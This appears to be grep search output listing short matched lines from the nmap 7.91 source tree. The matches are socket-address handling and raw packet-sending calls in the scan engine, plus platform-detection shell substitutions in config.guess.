nmap-7.91+dfsg1/osscan2.cc-836-      /* scanning localhost */
##############################################
nmap-7.91+dfsg1/osscan2.cc-904-          mergeFPs(FPR->FPs, FPR->numFPs, true,
nmap-7.91+dfsg1/osscan2.cc:905:               hsi->target->TargetSockAddr(), hsi->target->distance,
nmap-7.91+dfsg1/osscan2.cc-906-               hsi->target->distance_calculation_method,
##############################################
nmap-7.91+dfsg1/osscan2.cc-2133-      return -1;
nmap-7.91+dfsg1/osscan2.cc:2134:    res = send_ip_packet(rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/osscan2.cc-2135-    free(packet);
##############################################
nmap-7.91+dfsg1/osscan2.cc-2228-
nmap-7.91+dfsg1/osscan2.cc:2229:    if ((res = send_ip_packet(rawsd, ethptr, hss->target->TargetSockAddr(), packet, ntohs(ip->ip_len))) == -1)
nmap-7.91+dfsg1/osscan2.cc-2230-      {
##############################################
nmap-7.91+dfsg1/osscan2.cc-2442-  if (good_tcp_ipid_num >= 3) {
nmap-7.91+dfsg1/osscan2.cc:2443:    tcp_ipid_seqclass = get_ipid_sequence_16(good_tcp_ipid_num, hss->ipid.tcp_ipids, islocalhost(hss->target->TargetSockAddr()));
nmap-7.91+dfsg1/osscan2.cc-2444-  } else {
##############################################
nmap-7.91+dfsg1/osscan2.cc-2450-  if (good_tcp_closed_ipid_num >= 2) {
nmap-7.91+dfsg1/osscan2.cc:2451:    tcp_closed_ipid_seqclass = get_ipid_sequence_16(good_tcp_closed_ipid_num, hss->ipid.tcp_closed_ipids, islocalhost(hss->target->TargetSockAddr()));
nmap-7.91+dfsg1/osscan2.cc-2452-  } else {
##############################################
nmap-7.91+dfsg1/osscan2.cc-2456-  if (good_icmp_ipid_num >= 2) {
nmap-7.91+dfsg1/osscan2.cc:2457:    icmp_ipid_seqclass = get_ipid_sequence_16(good_icmp_ipid_num, hss->ipid.icmp_ipids, islocalhost(hss->target->TargetSockAddr()));
nmap-7.91+dfsg1/osscan2.cc-2458-  } else {
##############################################
nmap-7.91+dfsg1/lpeg.c-399-
nmap-7.91+dfsg1/lpeg.c:400:#define closeaddr(c)	((c)->s + (c)->siz - 1)
nmap-7.91+dfsg1/lpeg.c-401-
##############################################
nmap-7.91+dfsg1/lpeg.c-731-  }
nmap-7.91+dfsg1/lpeg.c:732:  cps[k].u.s.e = closeaddr(cs->cap - 1);  /* ends here */
nmap-7.91+dfsg1/lpeg.c-733-  return n;
##############################################
nmap-7.91+dfsg1/lpeg.c-789-      if (addonestring(b, cs, "replacement"))
nmap-7.91+dfsg1/lpeg.c:790:        curr = closeaddr(cs->cap - 1);  /* continue after match */
nmap-7.91+dfsg1/lpeg.c-791-      else  /* no capture value */
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-389-  srcaddr_len = sizeof(srcaddr);
nmap-7.91+dfsg1/scan_engine_raw.cc:390:  hss->target->SourceSockAddr(&srcaddr, &srcaddr_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-391-  /* Ensure the connection info matches. */
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-537-        ss_len = sizeof(target_src);
nmap-7.91+dfsg1/scan_engine_raw.cc:538:        hss->target->SourceSockAddr(&target_src, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-539-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-617-        ss_len = sizeof(target_src);
nmap-7.91+dfsg1/scan_engine_raw.cc:618:        hss->target->SourceSockAddr(&target_src, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-619-        ss_len = sizeof(target_dst);
nmap-7.91+dfsg1/scan_engine_raw.cc:620:        hss->target->TargetSockAddr(&target_dst, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-621-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-765-      ss_len = sizeof(target_src);
nmap-7.91+dfsg1/scan_engine_raw.cc:766:      hss->target->SourceSockAddr(&target_src, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-767-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-815-      ss_len = sizeof(target_dst);
nmap-7.91+dfsg1/scan_engine_raw.cc:816:      hss->target->SourceSockAddr(&target_src, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-817-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-887-    ss_len = sizeof(target_dst);
nmap-7.91+dfsg1/scan_engine_raw.cc:888:    hss->target->TargetSockAddr(&target_dst, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-889-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-901-      if (sockaddr_storage_cmp(&hdr.src, &target_dst) != 0) {
nmap-7.91+dfsg1/scan_engine_raw.cc:902:        hss->target->reason.set_ip_addr(&hdr.src);
nmap-7.91+dfsg1/scan_engine_raw.cc-903-      }
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-966-    source_len = sizeof(source);
nmap-7.91+dfsg1/scan_engine_raw.cc:967:    Targets[0]->SourceSockAddr(&source, &source_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-968-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-983-    source_len = sizeof(source);
nmap-7.91+dfsg1/scan_engine_raw.cc:984:    Targets[0]->SourceSockAddr(&source, &source_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-985-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1082-  source_len = sizeof(source);
nmap-7.91+dfsg1/scan_engine_raw.cc:1083:  hss->target->SourceSockAddr(&source, &source_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-1084-  sin6 = (struct sockaddr_in6 *) &source;
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1098-  hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1099:  send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1100-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1303-        hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1304:        send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1305-        free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1319-        hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1320:        send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1321-        free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1342-        hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1343:        send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1344-        free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1356-        hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1357:        send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1358-        free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1396-        hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1397:        send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1398-        free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1411-        hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1412:        send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1413-        free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1426-        sin->sin_addr = ((struct sockaddr_in *)&o.decoys[decoy])->sin_addr;
nmap-7.91+dfsg1/scan_engine_raw.cc:1427:        packet = build_protoscan_packet(&ss, hss->target->TargetSockAddr(),
nmap-7.91+dfsg1/scan_engine_raw.cc-1428-                                        pspec->proto, sport, &packetlen);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1434-        hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1435:        send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1436-        free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1446-        sin6->sin6_addr = ((struct sockaddr_in6 *)&o.decoys[decoy])->sin6_addr;
nmap-7.91+dfsg1/scan_engine_raw.cc:1447:        packet = build_protoscan_packet(&ss, hss->target->TargetSockAddr(),
nmap-7.91+dfsg1/scan_engine_raw.cc-1448-                                      pspec->proto, sport, &packetlen);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1454-        hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1455:        send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1456-        free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1471-      hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1472:      send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1473-      free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1486-      hss->probeSent(packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc:1487:      send_ip_packet(USI->rawsd, ethptr, hss->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/scan_engine_raw.cc-1488-      free(packet);
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1816-      ss_len = sizeof(target_src);
nmap-7.91+dfsg1/scan_engine_raw.cc:1817:      hss->target->SourceSockAddr(&target_src, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-1818-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-1914-      ss_len = sizeof(target_src);
nmap-7.91+dfsg1/scan_engine_raw.cc:1915:      hss->target->SourceSockAddr(&target_src, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-1916-      ss_len = sizeof(target_dst);
nmap-7.91+dfsg1/scan_engine_raw.cc:1917:      hss->target->TargetSockAddr(&target_dst, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-1918-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-2043-      ss_len = sizeof(target_src);
nmap-7.91+dfsg1/scan_engine_raw.cc:2044:      hss->target->SourceSockAddr(&target_src, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-2045-      ss_len = sizeof(target_dst);
nmap-7.91+dfsg1/scan_engine_raw.cc:2046:      hss->target->TargetSockAddr(&target_dst, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-2047-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-2164-      ss_len = sizeof(target_src);
nmap-7.91+dfsg1/scan_engine_raw.cc:2165:      hss->target->SourceSockAddr(&target_src, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-2166-
##############################################
nmap-7.91+dfsg1/scan_engine_raw.cc-2202-    ss_len = sizeof(target_dst);
nmap-7.91+dfsg1/scan_engine_raw.cc:2203:    hss->target->TargetSockAddr(&target_dst, &ss_len);
nmap-7.91+dfsg1/scan_engine_raw.cc-2204-
##############################################
nmap-7.91+dfsg1/config.guess-34-
nmap-7.91+dfsg1/config.guess:35:me=`echo "$0" | sed -e 's,.*/,,'`
nmap-7.91+dfsg1/config.guess-36-
##############################################
nmap-7.91+dfsg1/config.guess-102-: ${TMPDIR=/tmp} ;
nmap-7.91+dfsg1/config.guess:103: { tmp=`(umask 077 && mktemp -d "$TMPDIR/cgXXXXXX") 2>/dev/null` && test -n "$tmp" && test -d "$tmp" ; } ||
nmap-7.91+dfsg1/config.guess-104- { test -n "$RANDOM" && tmp=$TMPDIR/cg$$-$RANDOM && (umask 077 && mkdir $tmp) ; } ||
##############################################
nmap-7.91+dfsg1/config.guess-151-	EOF
nmap-7.91+dfsg1/config.guess:152:	eval `$CC_FOR_BUILD -E $dummy.c 2>/dev/null | grep '^LIBC' | sed 's, ,,g'`
nmap-7.91+dfsg1/config.guess-153-	;;
##############################################
nmap-7.91+dfsg1/config.guess-209-	    *)
nmap-7.91+dfsg1/config.guess:210:		release=`echo ${UNAME_RELEASE}|sed -e 's/[-_].*/\./'`
nmap-7.91+dfsg1/config.guess-211-		;;
##############################################
nmap-7.91+dfsg1/config.guess-240-	*4.0)
nmap-7.91+dfsg1/config.guess:241:		UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $3}'`
nmap-7.91+dfsg1/config.guess-242-		;;
nmap-7.91+dfsg1/config.guess-243-	*5.*)
nmap-7.91+dfsg1/config.guess:244:		UNAME_RELEASE=`/usr/sbin/sizer -v | awk '{print $4}'`
nmap-7.91+dfsg1/config.guess-245-		;;
##############################################
nmap-7.91+dfsg1/config.guess-250-	# types through head -n 1, so we only detect the type of CPU 0.
nmap-7.91+dfsg1/config.guess:251:	ALPHA_CPU_TYPE=`/usr/sbin/psrinfo -v | sed -n -e 's/^  The alpha \(.*\) processor.*$/\1/p' | head -n 1`
nmap-7.91+dfsg1/config.guess-252-	case "$ALPHA_CPU_TYPE" in
##############################################
nmap-7.91+dfsg1/config.guess-288-	# 1.2 uses "1.2" for uname -r.
nmap-7.91+dfsg1/config.guess:289:	echo ${UNAME_MACHINE}-dec-osf`echo ${UNAME_RELEASE} | sed -e 's/^[PVTX]//' | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz'`
nmap-7.91+dfsg1/config.guess-290-	# Reset EXIT trap before exiting to avoid spurious non-zero exit code.
##############################################
nmap-7.91+dfsg1/config.guess-348-    s390x:SunOS:*:*)
nmap-7.91+dfsg1/config.guess:349:	echo ${UNAME_MACHINE}-ibm-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/config.guess-350-	exit ;;
nmap-7.91+dfsg1/config.guess-351-    sun4H:SunOS:5.*:*)
nmap-7.91+dfsg1/config.guess:352:	echo sparc-hal-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/config.guess-353-	exit ;;
nmap-7.91+dfsg1/config.guess-354-    sun4*:SunOS:5.*:* | tadpole*:SunOS:5.*:*)
nmap-7.91+dfsg1/config.guess:355:	echo sparc-sun-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/config.guess-356-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-373-	fi
nmap-7.91+dfsg1/config.guess:374:	echo ${SUN_ARCH}-pc-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/config.guess-375-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-379-	# it's likely to be more like Solaris than SunOS4.
nmap-7.91+dfsg1/config.guess:380:	echo sparc-sun-solaris3`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/config.guess-381-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-388-	# Japanese Language versions have a version number like `4.1.3-JL'.
nmap-7.91+dfsg1/config.guess:389:	echo sparc-sun-sunos`echo ${UNAME_RELEASE}|sed -e 's/-/_/'`
nmap-7.91+dfsg1/config.guess-390-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-394-    sun*:*:4.2BSD:*)
nmap-7.91+dfsg1/config.guess:395:	UNAME_RELEASE=`(sed 1q /etc/motd | awk '{print substr($5,1,3)}') 2>/dev/null`
nmap-7.91+dfsg1/config.guess-396-	test "x${UNAME_RELEASE}" = "x" && UNAME_RELEASE=3
##############################################
nmap-7.91+dfsg1/config.guess-476-	$CC_FOR_BUILD -o $dummy $dummy.c &&
nmap-7.91+dfsg1/config.guess:477:	  dummyarg=`echo "${UNAME_RELEASE}" | sed -n 's/\([0-9]*\).*/\1/p'` &&
nmap-7.91+dfsg1/config.guess:478:	  SYSTEM_NAME=`$dummy $dummyarg` &&
nmap-7.91+dfsg1/config.guess-479-	    { echo "$SYSTEM_NAME"; exit; }
##############################################
nmap-7.91+dfsg1/config.guess-532-    *:IRIX*:*:*)
nmap-7.91+dfsg1/config.guess:533:	echo mips-sgi-irix`echo ${UNAME_RELEASE}|sed -e 's/-/_/g'`
nmap-7.91+dfsg1/config.guess-534-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-562-EOF
nmap-7.91+dfsg1/config.guess:563:		if $CC_FOR_BUILD -o $dummy $dummy.c && SYSTEM_NAME=`$dummy`
nmap-7.91+dfsg1/config.guess-564-		then
##############################################
nmap-7.91+dfsg1/config.guess-575-    *:AIX:*:[4567])
nmap-7.91+dfsg1/config.guess:576:	IBM_CPU_ID=`/usr/sbin/lsdev -C -c processor -S available | sed 1q | awk '{ print $1 }'`
nmap-7.91+dfsg1/config.guess-577-	if /usr/sbin/lsattr -El ${IBM_CPU_ID} | grep ' POWER' >/dev/null 2>&1; then
##############################################
nmap-7.91+dfsg1/config.guess-611-    9000/[34678]??:HP-UX:*:*)
nmap-7.91+dfsg1/config.guess:612:	HPUX_REV=`echo ${UNAME_RELEASE}|sed -e 's/[^.]*.[0B]*//'`
nmap-7.91+dfsg1/config.guess-613-	case "${UNAME_MACHINE}" in
##############################################
nmap-7.91+dfsg1/config.guess-665-EOF
nmap-7.91+dfsg1/config.guess:666:		    (CCOPTS= $CC_FOR_BUILD -o $dummy $dummy.c 2>/dev/null) && HP_ARCH=`$dummy`
nmap-7.91+dfsg1/config.guess-667-		    test -z "$HP_ARCH" && HP_ARCH=hppa
##############################################
nmap-7.91+dfsg1/config.guess-693-    ia64:HP-UX:*:*)
nmap-7.91+dfsg1/config.guess:694:	HPUX_REV=`echo ${UNAME_RELEASE}|sed -e 's/[^.]*.[0B]*//'`
nmap-7.91+dfsg1/config.guess-695-	echo ia64-hp-hpux${HPUX_REV}
##############################################
nmap-7.91+dfsg1/config.guess-723-EOF
nmap-7.91+dfsg1/config.guess:724:	$CC_FOR_BUILD -o $dummy $dummy.c && SYSTEM_NAME=`$dummy` &&
nmap-7.91+dfsg1/config.guess-725-		{ echo "$SYSTEM_NAME"; exit; }
##############################################
nmap-7.91+dfsg1/config.guess-794-	FUJITSU_SYS=`uname -p | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/\///'`
nmap-7.91+dfsg1/config.guess:795:	FUJITSU_REL=`echo ${UNAME_RELEASE} | sed -e 's/ /_/'`
nmap-7.91+dfsg1/config.guess-796-	echo "${FUJITSU_PROC}-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
##############################################
nmap-7.91+dfsg1/config.guess-799-	FUJITSU_SYS=`uname -p | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/\///'`
nmap-7.91+dfsg1/config.guess:800:	FUJITSU_REL=`echo ${UNAME_RELEASE} | tr 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' 'abcdefghijklmnopqrstuvwxyz' | sed -e 's/ /_/'`
nmap-7.91+dfsg1/config.guess-801-	echo "sparc-fujitsu-${FUJITSU_SYS}${FUJITSU_REL}"
##############################################
nmap-7.91+dfsg1/config.guess-815-	    amd64)
nmap-7.91+dfsg1/config.guess:816:		echo x86_64-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` ;;
nmap-7.91+dfsg1/config.guess-817-	    *)
nmap-7.91+dfsg1/config.guess:818:		echo ${UNAME_PROCESSOR}-unknown-freebsd`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'` ;;
nmap-7.91+dfsg1/config.guess-819-	esac
##############################################
nmap-7.91+dfsg1/config.guess-873-    prep*:SunOS:5.*:*)
nmap-7.91+dfsg1/config.guess:874:	echo powerpcle-unknown-solaris2`echo ${UNAME_RELEASE}|sed -e 's/[^.]*//'`
nmap-7.91+dfsg1/config.guess-875-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-877-	# the GNU system
nmap-7.91+dfsg1/config.guess:878:	echo `echo ${UNAME_MACHINE}|sed -e 's,[-/].*$,,'`-unknown-${LIBC}`echo ${UNAME_RELEASE}|sed -e 's,/.*$,,'`
nmap-7.91+dfsg1/config.guess-879-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-881-	# other systems with GNU libc and userland
nmap-7.91+dfsg1/config.guess:882:	echo ${UNAME_MACHINE}-unknown-`echo ${UNAME_SYSTEM} | sed 's,^[^/]*/,,' | tr '[A-Z]' '[a-z]'``echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'`-${LIBC}
nmap-7.91+dfsg1/config.guess-883-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-969-EOF
nmap-7.91+dfsg1/config.guess:970:	eval `$CC_FOR_BUILD -E $dummy.c 2>/dev/null | grep '^CPU'`
nmap-7.91+dfsg1/config.guess-971-	test x"${CPU}" != x && { echo "${CPU}-unknown-linux-${LIBC}"; exit; }
##############################################
nmap-7.91+dfsg1/config.guess-1063-    i*86:*:4.*:* | i*86:SYSTEM_V:4.*:*)
nmap-7.91+dfsg1/config.guess:1064:	UNAME_REL=`echo ${UNAME_RELEASE} | sed 's/\/MP$//'`
nmap-7.91+dfsg1/config.guess-1065-	if grep Novell /usr/include/link.h >/dev/null 2>/dev/null; then
##############################################
nmap-7.91+dfsg1/config.guess-1263-	fi
nmap-7.91+dfsg1/config.guess:1264:	if test `echo "$UNAME_RELEASE" | sed -e 's/\..*//'` -le 10 ; then
nmap-7.91+dfsg1/config.guess-1265-	    if [ "$CC_FOR_BUILD" != 'no_compiler_found' ]; then
##############################################
nmap-7.91+dfsg1/config.guess-1348-    *:DragonFly:*:*)
nmap-7.91+dfsg1/config.guess:1349:	echo ${UNAME_MACHINE}-unknown-dragonfly`echo ${UNAME_RELEASE}|sed -e 's/[-(].*//'`
nmap-7.91+dfsg1/config.guess-1350-	exit ;;
##############################################
nmap-7.91+dfsg1/config.guess-1361-    i*86:skyos:*:*)
nmap-7.91+dfsg1/config.guess:1362:	echo ${UNAME_MACHINE}-pc-skyos`echo ${UNAME_RELEASE}` | sed -e 's/ .*$//'
nmap-7.91+dfsg1/config.guess-1363-	exit ;;
##############################################
nmap-7.91+dfsg1/portreasons.cc-80-   known. */
nmap-7.91+dfsg1/portreasons.cc:81:int port_reason::set_ip_addr(const struct sockaddr_storage *ss) {
nmap-7.91+dfsg1/portreasons.cc-82-  if (ss->ss_family == AF_INET) {
##############################################
nmap-7.91+dfsg1/portlist.cc-873-    else
nmap-7.91+dfsg1/portlist.cc:874:      answer->reason.set_ip_addr(ip_addr);
nmap-7.91+dfsg1/portlist.cc-875-    answer->reason.ttl = ttl;
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.h-322- * Returns 0 on success or -1 in case of error. */
nmap-7.91+dfsg1/libnetutil/netutil.h:323:int devname2ipaddr(char *dev, struct sockaddr_storage *addr);
nmap-7.91+dfsg1/libnetutil/netutil.h-324-
##############################################
nmap-7.91+dfsg1/libnetutil/ICMPv6Header.h-188-#define ICMPv6_NODEINFOQUERY               139   /* ICMP Node Information Query  [RFC 4620] */
nmap-7.91+dfsg1/libnetutil/ICMPv6Header.h:189:#define     ICMPv6_NODEINFOQUERY_IPv6ADDR  (0)   /*  --> The Data field contains an IPv6 address */
nmap-7.91+dfsg1/libnetutil/ICMPv6Header.h-190-#define     ICMPv6_NODEINFOQUERY_NAME      (1)   /*  --> The Data field contains a name */
nmap-7.91+dfsg1/libnetutil/ICMPv6Header.h:191:#define     ICMPv6_NODEINFOQUERY_IPv4ADDR  (2)   /*  --> The Data field contains an IPv4 address */
nmap-7.91+dfsg1/libnetutil/ICMPv6Header.h-192-#define ICMPv6_NODEINFORESP                140   /* ICMP Node Information Response  [RFC 4620] */
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-1434-
nmap-7.91+dfsg1/libnetutil/netutil.cc:1435:int devname2ipaddr(char *dev, struct sockaddr_storage *addr) {
nmap-7.91+dfsg1/libnetutil/netutil.cc-1436-  struct interface_info *mydevs;
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-2995-/* Fill in a sockaddr_storage given an address family and raw address. */
nmap-7.91+dfsg1/libnetutil/netutil.cc:2996:static int set_sockaddr(struct sockaddr_storage *ss, int af, void *data) {
nmap-7.91+dfsg1/libnetutil/netutil.cc-2997-  struct sockaddr_in *sin;
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-3019-   sin6_scope_id is nonzero. */
nmap-7.91+dfsg1/libnetutil/netutil.cc:3020:static void add_rtattr_addr(struct nlmsghdr *nlmsg,
nmap-7.91+dfsg1/libnetutil/netutil.cc-3021-                            struct rtattr **rtattr, unsigned int *len,
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-3132-  /* Add rtattrs for destination address and interface. */
nmap-7.91+dfsg1/libnetutil/netutil.cc:3133:  add_rtattr_addr(nlmsg, &rtattr, &len, RTA_DST, dst, intf_index);
nmap-7.91+dfsg1/libnetutil/netutil.cc-3134-  if (spoofss != NULL) {
nmap-7.91+dfsg1/libnetutil/netutil.cc-3135-    /* Add rtattrs for source address and interface. */
nmap-7.91+dfsg1/libnetutil/netutil.cc:3136:    add_rtattr_addr(nlmsg, &rtattr, &len, RTA_SRC, spoofss, intf_index);
nmap-7.91+dfsg1/libnetutil/netutil.cc-3137-  }
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-3177-    if (rtattr->rta_type == RTA_GATEWAY) {
nmap-7.91+dfsg1/libnetutil/netutil.cc:3178:      rc = set_sockaddr(&rnfo->nexthop, dst->ss_family, RTA_DATA(rtattr));
nmap-7.91+dfsg1/libnetutil/netutil.cc-3179-      assert(rc != -1);
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-3196-    } else if (rtattr->rta_type == RTA_PREFSRC && rnfo->srcaddr.ss_family == AF_UNSPEC) {
nmap-7.91+dfsg1/libnetutil/netutil.cc:3197:      rc = set_sockaddr(&rnfo->srcaddr, dst->ss_family, RTA_DATA(rtattr));
nmap-7.91+dfsg1/libnetutil/netutil.cc-3198-      assert(rc != -1);
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-3225-   operating system for the local address. */
nmap-7.91+dfsg1/libnetutil/netutil.cc:3226:static int get_srcaddr(const struct sockaddr_storage *dst,
nmap-7.91+dfsg1/libnetutil/netutil.cc-3227-  struct sockaddr_storage *src)
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-3368-    if (!spoofss) {
nmap-7.91+dfsg1/libnetutil/netutil.cc:3369:      if (get_srcaddr(dst, &rnfo->srcaddr) == -1)
nmap-7.91+dfsg1/libnetutil/netutil.cc-3370-        rnfo->srcaddr = rnfo->ii.addr;
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-3396-    if (!spoofss) {
nmap-7.91+dfsg1/libnetutil/netutil.cc:3397:      if (get_srcaddr(dst, &rnfo->srcaddr) == -1)
nmap-7.91+dfsg1/libnetutil/netutil.cc-3398-        rnfo->srcaddr = rnfo->ii.addr;
##############################################
nmap-7.91+dfsg1/libnetutil/netutil.cc-3417-    if (!spoofss) {
nmap-7.91+dfsg1/libnetutil/netutil.cc:3418:      if (get_srcaddr(dst, &rnfo->srcaddr) == -1)
nmap-7.91+dfsg1/libnetutil/netutil.cc-3419-        rnfo->srcaddr = rnfo->ii.addr;
##############################################
nmap-7.91+dfsg1/libssh2/os400/initscript.sh-27-
nmap-7.91+dfsg1/libssh2/os400/initscript.sh:28:TOPDIR=`dirname "${SCRIPTDIR}"`
nmap-7.91+dfsg1/libssh2/os400/initscript.sh-29-export SCRIPTDIR TOPDIR
##############################################
nmap-7.91+dfsg1/libssh2/os400/initscript.sh-142-                .)      ;;
nmap-7.91+dfsg1/libssh2/os400/initscript.sh:143:                ..)     R=`expr "${R}" : '^\(.*/\)..*'`
nmap-7.91+dfsg1/libssh2/os400/initscript.sh-144-                        ;;
##############################################
nmap-7.91+dfsg1/libssh2/os400/initscript.sh-151-        IFS="${IFSSAVE}"
nmap-7.91+dfsg1/libssh2/os400/initscript.sh:152:        echo "/`expr "${R}" : '^\(.*\)/'`"
nmap-7.91+dfsg1/libssh2/os400/initscript.sh-153-}
##############################################
nmap-7.91+dfsg1/libssh2/os400/initscript.sh-167-        action_needed "${MODIFSNAME}" "${2}" || return 0;
nmap-7.91+dfsg1/libssh2/os400/initscript.sh:168:        SRCDIR=`dirname \`canonicalize_path "${2}"\``
nmap-7.91+dfsg1/libssh2/os400/initscript.sh-169-
##############################################
nmap-7.91+dfsg1/libssh2/os400/os400sys.c-77-static int
nmap-7.91+dfsg1/libssh2/os400/os400sys.c:78:convert_sockaddr(struct sockaddr_storage * dstaddr,
nmap-7.91+dfsg1/libssh2/os400/os400sys.c-79-                                const struct sockaddr * srcaddr, int srclen)
##############################################
nmap-7.91+dfsg1/libssh2/os400/os400sys.c-120-
nmap-7.91+dfsg1/libssh2/os400/os400sys.c:121:  i = convert_sockaddr(&laddr, destaddr, addrlen);
nmap-7.91+dfsg1/libssh2/os400/os400sys.c-122-
##############################################
nmap-7.91+dfsg1/libssh2/os400/make-rpg.sh-5-
